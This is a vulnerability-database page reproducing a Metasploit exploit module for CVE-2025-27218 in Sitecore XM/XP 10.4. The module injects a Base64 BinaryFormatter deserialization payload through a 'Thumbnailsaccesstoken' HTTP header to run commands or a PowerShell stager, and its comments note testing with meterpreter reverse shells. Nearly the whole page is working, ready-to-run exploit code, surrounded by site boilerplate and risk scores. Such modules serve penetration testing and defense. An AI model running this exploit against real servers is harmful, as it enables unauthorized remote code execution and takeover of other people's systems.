Lucene search
K

Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit

🗓️ 28 Mar 2025 18:50:06Reported by Dylan Pindur, machang-r7Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 506 Views

Exploits Sitecore CVE-2025-27218 .NET deserialization using malicious payload in HTTP header.

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Util::DotNetDeserialization
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit',
        'Description' => %q{
          This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience
          Platform (XP) 10.4 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Dylan Pindur', # Discovery
          'machang-r7'    # Module Creator
        ],
        'References' => [
          ['CVE', '2025-27218'],
          ['EDB', '52344'],
          ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535'],
          ['URL', 'https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218']
        ],
        'DisclosureDate' => '2025-01-06',
        'DefaultTarget' => 0,
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows Command',
            {
              'Arch' => ARCH_CMD,
              'Type' => :windows_command
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ],
          [
            'PowerShell Stager',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :psh_stager
              # tested with windows/x64/meterpreter/reverse_tcp
            }
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/'])
    ])
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    })

    if res&.code == 200 && res&.get_html_document&.at('//title')&.text&.strip == 'Welcome to Sitecore'
      CheckCode::Detected('The target is running SiteCore.')
    else
      CheckCode::Safe('The target does not appear to be running SiteCore.')
    end
  end

  def exploit
    case target['Type']
    when :windows_command
      execute_command(payload.encoded)
    when :psh_stager
      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
    end
  end

  def execute_command(cmd, _opts = {})
    sploit = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :WindowsIdentity,
      formatter: :BinaryFormatter
    ))

    # Build HTTP request with malicious header
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET',
      'headers' => {
        'Thumbnailsaccesstoken' => sploit
      }
    })

    if res && res.code == 200
      print_good('Server responded with 200, this probably means it worked.')
    else
      print_error("Server didn't respond with 200. Try setting the target URL to a valid page.")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Jul 2026 19:02Current
7.3High risk
Vulners AI Score7.3
CVSS 3.15.3
EPSS0.6356
SSVC
506